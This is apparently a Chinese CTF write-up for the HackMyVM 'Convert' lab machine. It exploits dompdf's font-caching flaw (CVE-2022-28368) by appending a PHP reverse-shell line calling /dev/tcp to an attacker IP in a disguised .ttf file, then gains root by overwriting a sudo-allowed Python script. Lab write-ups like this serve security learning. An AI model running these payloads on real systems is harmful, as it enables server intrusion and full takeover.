当前位置：首页 > article >正文

HakcMyVM-Convert

article 2026/4/25 10:10:30

信息搜集主机发现┌──(kali㉿kali)-[~] └─$ nmap -sn 192.168.21.0/24 Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-24 02:18 EDT Nmap scan report for 192.168.21.6 Host is up (0.00046s latency). MAC Address: 08:00:27:E7:D5:88 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.21.7 Host is up. Nmap done: 256 IP addresses (6 hosts up) scanned in 2.77 seconds端口扫描┌──(kali㉿kali)-[~] └─$ nmap -sV -p- 192.168.21.6 Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-24 02:19 EDT Nmap scan report for 192.168.21.6 Host is up (0.00041s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.2p1 Debian 2deb12u2 (protocol 2.0) 80/tcp open http nginx 1.22.1 MAC Address: 08:00:27:E7:D5:88 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.74 seconds漏洞利用看一下80端口HTML-to-PDF转换器目录枚举┌──(kali㉿kali)-[~] └─$ gobuster dir -w SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -x html,php,txt,jpg,png,zip,git -u http://192.168.21.6 Gobuster v3.6 by OJ Reeves (TheColonial) Christian Mehlmauer (firefart) [] Url: http://192.168.21.6 [] Method: GET [] Threads: 10 [] Wordlist: SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt [] Negative Status codes: 404 [] User Agent: gobuster/3.6 [] Extensions: html,php,txt,jpg,png,zip,git [] Timeout: 10s Starting gobuster in directory enumeration mode /index.php (Status: 200) [Size: 1026] /upload (Status: 301) [Size: 169] [-- http://192.168.21.6/upload/] Progress: 9482032 / 9482040 (100.00%) Finished 尝试文件包含但是没有成功看了一下好像是CVE-2022-28368寻找一个.ttf字体文件将其改为.php文件并添加上shell┌──(kali㉿kali)-[~] └─$ find / -name *.ttf 2/dev/null ┌──(kali㉿kali)-[~] └─$ cp /usr/lib/gophish/static/font/fontawesome-webfont.ttf ./exp.php ┌──(kali㉿kali)-[~] └─$ echo ?php system(bash -c \bash -i /dev/tcp/192.168.21.7/4444 01\); ? ./exp.php在创建一个css文件┌──(kali㉿kali)-[~] └─$ cat exp.css font-face { font-family: exp; src: url(http://192.168.21.7:8080/exp.php); font-weight: normal; font-style: normal; }在创建一个html文件借此来触发┌──(kali㉿kali)-[~] └─$ cat exp.html !DOCTYPE html html head link relstylesheet hrefhttp://192.168.21.7:8080/exp.css /head body div stylefont-family: exp; New Font... /div /body /html开始利用┌──(kali㉿kali)-[~] └─$ python -m http.server 8080 网页触发http://192.168.21.7:8080/exp.html 成功触发 192.168.21.6 - - [24/Apr/2026 04:11:08] GET /exp.html HTTP/1.1 200 - 192.168.21.6 - - [24/Apr/2026 04:11:08] GET /exp.css HTTP/1.1 200 - 192.168.21.6 - - [24/Apr/2026 04:11:08] GET /exp.php HTTP/1.1 200 - 缓存文件名是基于字体名、样式、权重和MD5哈希生成的格式为字体族名_字体样式_md5哈希值.php计算一下MD5是多少┌──(kali㉿kali)-[~]└─$ echo -n “http://192.168.21.7:8080/exp.php” | md5sum12c572ccb65e130e206986e53354e0af -通常缓存在/vendor/dompdf/dompdf/lib/fonts/目录下尝试触发┌──(kali㉿kali)-[~]└─$ curl “http://192.168.21.6/dompdf/lib/fonts/exp_normal_12c572ccb65e130e206986e53354e0af.php”Warning: Binary output can mess up your terminal. Use “–output -”Warning: to tell curl to output it to your terminal anyway, orWarning: consider “–output ” to save to a file.┌──(kali㉿kali)-[~]└─$ nc -lvnp 4444listening on [any] 4444 …connect to [192.168.21.7] from (UNKNOWN) [192.168.21.6] 41868bash: cannot set terminal process group (484): Inappropriate ioctl for devicebash: no job control in this shellevaconvert:/var/www/html/dompdf/lib/fonts$ ididuid1000(eva) gid1000(eva) groups1000(eva)# 权限提升evaconvert:/var/www/html$ sudo -lsudo -lMatching Defaults entries for eva on convert:env_reset, mail_badpass,secure_path/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin,use_ptyUser eva may run the following commands on convert:(ALL : ALL) NOPASSWD: /usr/bin/python3 /home/eva/pdfgen.py *//我们在eva目录下拥有写的权限evaconvert:/var/www/html$ cat /home/eva/pdfgen.pycat /home/eva/pdfgen.pyfrom os import pathfrom time import timefrom weasyprint import HTML, CSSfrom urllib.parse import urlparsefrom argparse import ArgumentParserfrom logging import basicConfig, INFO, error, info, exceptiondef prune_log(log_file, max_size1):try:log_size path.getsize(log_file) / (1024 * 1024)if log_size max_size:with open(log_file, ‘w’):passinfo(fLog file pruned. Size exceeded {max_size} MB.“)print(fLog file pruned. Size exceeded {max_size} MB.”)except Exception as e:print(fError pruning log file: {e})log_file ‘/home/eva/pdf_gen.log’prune_log(log_file)basicConfig(levelINFO, filenamelog_file, filemode‘a’,format‘%(asctime)s - %(levelname)s - %(message)s’)def is_path_allowed(output_path):blocked_directories [“/root”, “/etc”]for directory in blocked_directories:if output_path.startswith(directory):return Falsereturn Truedef url_html_to_pdf(url, output_path):block_schemes [“file”, “data”]block_hosts [“127.0.0.1”, “localhost”]blocked_directories [“/root”, “/etc”]try: start_time time() scheme urlparse(url).scheme hostname urlparse(url).hostname if scheme in block_schemes: error(f{scheme} scheme is Blocked) print(fError: {scheme} scheme is Blocked) return if hostname in block_hosts: error(f{hostname} hostname is Blocked) print(fError: {hostname} hostname is Blocked) return if not is_path_allowed(output_path): error(fOutput path is not allowed in {blocked_directories} directories) print(fError: Output path is not allowed in {blocked_directories} directories) return html HTML(url.strip()) html.write_pdf(output_path, stylesheets[CSS(stringpage { size: A3; margin: 1cm })]) end_time time() elapsed_time end_time - start_time info(fPDF generated successfully at {output_path} in {elapsed_time:.2f} seconds) print(fPDF generated successfully at {output_path} in {elapsed_time:.2f} seconds) except Exception as e: exception(fError: {e}) print(fError: {e})ifname “main”:parser ArgumentParser(description“Convert HTML content from a URL to a PDF file.”)parser.add_argument(“-U”, “–url”, help“URL of the HTML content to convert”, requiredTrue)parser.add_argument(“-O”, “–out”, help“Output file path for the generated PDF”, default“/home/eva/output.pdf”)args parser.parse_args() url_html_to_pdf(args.url, args.out)//创建一个恶意文件evaconvert:/var/www/html$ echo ‘import os; os.system(“/bin/bash”)’ /home/eva/exp.pyport os; os.system(“/bin/bash”)’ /home/eva/exp.py//将其把原来的文件替换掉evaconvert:/var/www/html$ mv /home/eva/exp.py /home/eva/pdfgen.pymv /home/eva/exp.py /home/eva/pdfgen.py//以root的身份执行我们的脚本pwned没任何作用只是为了符合带参数条件evaconvert:/var/www/html$ sudo /usr/bin/python3 /home/eva/pdfgen.py pwnedsudo /usr/bin/python3 /home/eva/pdfgen.py pwnediduid0(root) gid0(root) groups0(root)

HakcMyVM-Convert

相关文章：

HakcMyVM-Convert

Python-docx页面布局踩坑实录：从‘首页页眉消失’到‘奇偶页错乱’的排错指南

机器学习特征工程实战：从原理到工具全解析

Arm URSHL指令：多向量无符号舍入移位技术解析

多元多步多站点时间序列预测在空气质量监测中的应用

保姆级教程：在RK3568上为PR2100K和GC2385配置camera3_profiles.xml

3步彻底清理显卡驱动：Display Driver Uninstaller完全指南

Linux内核KASLR机制深度解析：从安全原理到实战调试的完整指南（地址空间、符号表、gdb）

wechat-need-web浏览器扩展解决方案：跨平台微信网页版访问技术实现

如何让Blender成为你的3D打印创意工厂：3MF插件终极指南

USB隔离

5分钟轻松掌握：WebSite-Downloader 完整网站离线下载指南

从JDK动态代理到CGLIB：Spring事务@EnableTransactionManagement中proxyTargetClass参数的真实影响

【架构实战】CQRS架构模式实战

MATLAB R2022a + YOLOv5s：手把手教你搭建一个带中文界面的目标检测小工具（附完整代码）

Qwen3.6-27B 开源：昇腾适配已到位，AtomGit AI 开放体验

从AGC到传感器信号处理：峰值检测电路的5个实战应用场景与电路调试避坑指南

终极指南：如何用FakeLocation实现应用级位置模拟，保护你的隐私与突破地理限制

前端模块热更新机制原理

TNF-α蛋白的结构特征与信号转导机制研究

Windows虚拟显示器终极指南：3分钟免费扩展无限屏幕空间

VSCode容器化效率提升300%：从本地调试到K8s DevSpace的7个不可跳过的工程实践

给STM32裸机程序加点料：手把手教你用FreeRTOS创建第一个任务（附代码）

从Docking到Gromacs：一个药物筛选新手的完整计算流程（含软件选择与避坑指南）

WinSW实战踩坑记：解决Windows Server上Jar服务‘找不到文件’的诡异问题

VSCode工业级开发环境搭建：从零到交付，7步实现毫秒级响应与企业级安全合规

解锁SillyTavern：打造有灵魂的AI角色对话体验

实战验证：爱搜索GEO营销系统如何为工业制造企业实现精准AI搜索优化

别再只会用imshow了！Matlab图像显示从入门到精通，一篇搞定灰度、RGB、二值图

基于卷积神经网络的球罐结构损伤识别